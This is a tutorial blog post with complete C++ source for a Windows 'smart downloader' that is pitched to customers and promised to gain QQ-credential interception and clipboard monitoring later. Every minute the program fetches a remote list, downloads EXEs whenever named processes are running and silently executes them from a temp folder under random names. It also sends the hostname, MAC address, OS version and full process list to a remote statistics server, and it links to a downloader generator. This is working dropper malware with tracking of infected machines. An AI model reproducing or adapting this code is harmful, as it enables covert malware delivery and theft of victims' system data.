- Due to recent business needs, a smart downloader has been customized according to customer requirements (determining processes, running DLLs, locking browser homepage, obtaining system information, intercepting QQ KEY, monitoring clipboard, background statistics, etc.)
- So I came up with an idea to teach you how to build your own smart downloader. Experts can skip it.
Step 1
First open the compiler (VS 2015), create a new win32 project named downloader, and set its properties.
Step 2
Obtain relevant information about the target system and download the remote list file to the specified location.
TCHAR szLBFile[MAX_PATH] = "http://192.168.6.1/load.txt"; // 远程列表文件地址
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // 列表文件本地保存地址
// 获取系统相关配置目录路径
// CSIDL_LOCAL_APPDATA
// FOLDERID_LocalAppData
// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。
// 典型路径为 C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);Loads URLDownloadToFileA from urlmon.dll for downloading related files.
Step 3
After the remote list file is downloaded, we need to read the data inside and determine the specified process.
The fgets function is used here to read each line of data from the list file.
TCHAR Buffer[MAX_PATH] = { 0 };
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
...
}List file content format example:
calc.exe|http://192.168.6.1/Hello.exe
notepad.exe|http://192.168.6.1/play.exe
conhost.exe|http://192.168.6.1/Wmplayer.exe- “calc.exe” indicates the target process that needs to be judged
- "|" is the delimiter
- " http://192.168.6.1/Hello.exe " is the download address
Then use Find in CString to find the corresponding data.
CString szProcess = NULL, szURL = NULL;
// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。
// 找不到返回-1值
int pos = myText.Find("|");
if (pos >= 0)
{
// 目标进程
// 把左边的第一段放到szProcess中
szProcess.Format("%s", myText.Left(pos));
// 下载地址
// 把除第一段剩下的放到szURL中
szURL.Format("%s", myText.Mid(pos + 1));
} 
After compilation, let's take a look at the effect.
Demo picture:
Step 4
After all the above operations are completed, we can now use the extracted data to judge the process and download the specified file.
CreateToolhelp32Snap
Need to add the header file #include <tlhelp32.h>
The function creates a snapshot for the specified process, the heap [HEAP], module [MODULE], and thread used by the process by obtaining process information. After all, you can get process information, thread information, etc. running in the system.
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32x = {sizeof(PROCESSENTRY32),0};
if( Process32First(hShot,&pe32x) )
{
CString TargetName = NULL;
TargetName.Format("%s", szProcess);
TargetName.MakeLower();
do{
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if( ProcessName == TargetName )
{
CloseHandle(hShot);
return TRUE;
}
}while( Process32Next(hShot, &pe32x) );
}
CloseHandle(hShot);
return FALSE;
}Example:
// 判断系统是否存在指定进程
if (GetProcessName(szProcess))
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j<16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(50);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
WinExec(myEXESaveFile, SW_SHOW);
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
}Judgment data and current system information:
Effect demonstration:
Step 5
After all operations are completed, we need to start working on our statistical system.
Statistical information includes (system information, MAC address, machine name, IP address, system process, etc.)
Get MAC address:
/
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}Read the registry to get the system version:
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0=(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if(ret0 == ERROR_SUCCESS)
{
LPBYTE owner_Get1=new BYTE[80];
DWORD type_1=REG_SZ;
DWORD cbData_1=80;
ZeroMemory(osx, MAX_PATH * sizeof(CHAR));
long ret1=::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if(ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// 判断是否 64 位系统
if(IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
BOOL IsWow64OSEx()
{
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
}
return bIsWow64;
}Get the machine name:
WSADATA _wsaData = { 0 };
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2,2),&_wsaData);
if(_Result == SOCKET_ERROR)
{
lstrcat(jsj,"unkonw1");
}
_Result = gethostname(jsj,sizeof(jsj));
if(_Result == SOCKET_ERROR)
{
lstrcat(jsj,"unkonw2");
}
WSACleanup();Get all processes in the system:
///
CString GetAllProcessNames()
{
CString AllProcessNames = NULL;
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32 = {sizeof(PROCESSENTRY32),0};
if( Process32First(hShot2,&pe32) )
{
do{
CString GetProcessName = NULL;
GetProcessName.Format("%s", pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
}while( Process32Next(hShot2, &pe32) );
}
CloseHandle(hShot2);
return AllProcessNames;
}
Connect background statistics:
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
TCHAR mac[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
// 获取机器名称
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
// 构建统计数据
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
//AfxMessageBox(buffer);
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
if (myMSG1 || myMSG2)
{
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}The effect of running the program after compilation:
Complete code:
stdafx.h
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
#define _AFX_NO_MFC_CONTROLS_IN_DIALOGS // 移除对话框中的 MFC 控件支持
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头中排除极少使用的资料
#endif
#include <afx.h>
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <iostream>
// TODO: 在此处引用程序需要的其他头文件
#include <time.h>
#include <tlhelp32.h>
#include <Nb30.h>
#pragma comment(lib, "Netapi32.lib")
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <Wininet.h>
#pragma comment(lib, "Wininet.lib") downloader.cpp
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 动态加载
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();
BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2);
void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);
TCHAR szLBFile[MAX_PATH] = "http://192.168.6.1/load.txt"; // 远程列表文件地址
TCHAR szCountUrl[MAX_PATH] = "http://192.168.6.130"; // 程序统计接口地址
TCHAR szVersion[MAX_PATH] = "1.0"; // 程序版本号
TCHAR szUserID[MAX_PATH] = "admin"; // 客户编号
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // 列表文件本地保存地址
TCHAR szEXESaveFile[MAX_PATH] = { 0 }; // 下载的程序保存路径
TCHAR osx[MAX_PATH] = { 0 }; // 系统版本存放变量
TCHAR CGLB[10240] = { 0 }; // 分配 10M 内存来保存成功下载的地址
BOOL TJ = FALSE;
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
int main()
{
// 获取系统相关配置目录路径
// CSIDL_LOCAL_APPDATA
// FOLDERID_LocalAppData
// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。
// 典型路径为 C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
lstrcat(szEXESaveFile, "\\Temp");
do{
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
Sleep(500);
CString myText = NULL;
TCHAR Buffer[MAX_PATH] = { 0 };
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
myText.Format("%s", Buffer);
//AfxMessageBox(myText);
CString szProcess = NULL, szURL = NULL;
// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。
// 找不到返回-1值
int pos = myText.Find("|");
if (pos >= 0)
{
// 目标进程
// 把左边的第一段放到szProcess中
szProcess.Format("%s", myText.Left(pos));
//AfxMessageBox(szProcess);
// 下载地址
// 把除第一段剩下的放到szURL中
szURL.Format("%s", myText.Mid(pos + 1));
//AfxMessageBox(szURL);
TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);
// 判断成功列表里是否存在该下载地址
if ( !strstr(CGLB, TargetURL) )
{
// 判断系统是否存在指定进程
if (GetProcessName(szProcess))
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(50);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
//AfxMessageBox(myEXESaveFile);
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
WinExec(myEXESaveFile, SW_SHOW);
// 成功下载并运行后
// 保存地址在成功列表
// 防止程序重复下载
lstrcat(CGLB, TargetURL);
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
}
}
}
}
fclose(TK);
DeleteFile(szLBSaveFile);
if ( !TJ )
{
// 统计数据
if (SendDataToCount())
{
TJ = TRUE;
}
}
// 延时一分钟
Sleep(60000);
} while (1);
return 0;
}
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot, &pe32x))
{
CString TargetName = NULL;
TargetName.Format(TEXT("%s"), szProcess);
TargetName.MakeLower();
do {
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if (ProcessName == TargetName)
{
CloseHandle(hShot);
return TRUE;
}
} while (Process32Next(hShot, &pe32x));
}
CloseHandle(hShot);
return FALSE;
}
CString GetAllProcessNames()
{
CString AllProcessNames = "";
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot2, &pe32))
{
do {
CString GetProcessName = "";
GetProcessName.Format(TEXT("%s"), pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
} while (Process32Next(hShot2, &pe32));
}
CloseHandle(hShot2);
return AllProcessNames;
}
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
ZeroMemory(dat, 10240 * sizeof(TCHAR));
ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
GetWinOS();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
// 构建统计数据
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
if (myMSG1 || myMSG2)
{
return TRUE;
}
else
{
// 由于提取的数据过长会导致统计失败
// 这里省去 szProcess 重新统计
TCHAR postData[1024] = { 0 };
ZeroMemory(postData, 1024 * sizeof(TCHAR));
lstrcpy(postData, szCountUrl);
lstrcat(postData, "?ver=");
lstrcat(postData, szVersion);
lstrcat(postData, "&ID=");
lstrcat(postData, szUserID);
lstrcat(postData, "&CP=");
lstrcat(postData, jsj);
lstrcat(postData, "&os=");
lstrcat(postData, osx);
lstrcat(postData, "&mac=");
lstrcat(postData, MAC);
if (PostDataToCount(postData, "Success", "Fail"))
{
return TRUE;
}
else
{
return FALSE;
}
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2)
{
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
TCHAR *myMSG1;
myMSG1 = strstr(buffer, szState1);
TCHAR *myMSG2;
myMSG2 = strstr(buffer, szState2);
if (myMSG1 || myMSG2)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if (ret0 == ERROR_SUCCESS)
{
LPBYTE owner_Get1 = new BYTE[80];
DWORD type_1 = REG_SZ;
DWORD cbData_1 = 80;
ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));
long ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if (ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// 判断是否 64 位系统
if (IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
BOOL IsWow64OSEx()
{
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
fnIsWow64Process(GetCurrentProcess(), &bIsWow64);
}
return bIsWow64;
}
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}
Conclusion
At this point, your own intelligent judgment downloader has been created. I will teach you how to add new functions later, such as intercepting QQ KEY, monitoring the clipboard, locking the browser homepage, etc.
Complete project download
[Source code download] 
https://download.csdn.net/download/qq_39190622/88357881
[Rainbow statistical system download] https://download.csdn.net/download/qq_39190622/88358271
[Rainbow Downloader Generator Download 1] https://download.csdn.net/download/qq_39190622/88358280
[Rainbow Downloader Generator Download 2] https://wwrd.lanzoum.com/i8pgh194ilxc